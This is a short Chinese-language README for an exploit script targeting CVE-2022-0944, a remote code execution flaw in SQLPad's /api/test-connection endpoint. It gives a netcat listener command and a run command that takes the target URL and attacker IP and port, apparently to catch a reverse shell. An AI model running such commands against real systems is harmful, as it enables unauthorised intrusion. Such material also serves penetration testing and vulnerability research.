此仓库包含一个针对 SQLPad 中 CVE-2022-0944 的漏洞利用脚本,该漏洞允许通过 /api/test-connection 端点进行远程代码执行(RCE)。
提供的脚本 (exploit.py) 演示了如何利用 SQLPad 中的 RCE 漏洞。该脚本向易受攻击的端点发送 payload,在目标服务器上执行命令。
requests 库(可通过 pip 安装)nc -lvnp 4444
运行漏洞利用
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>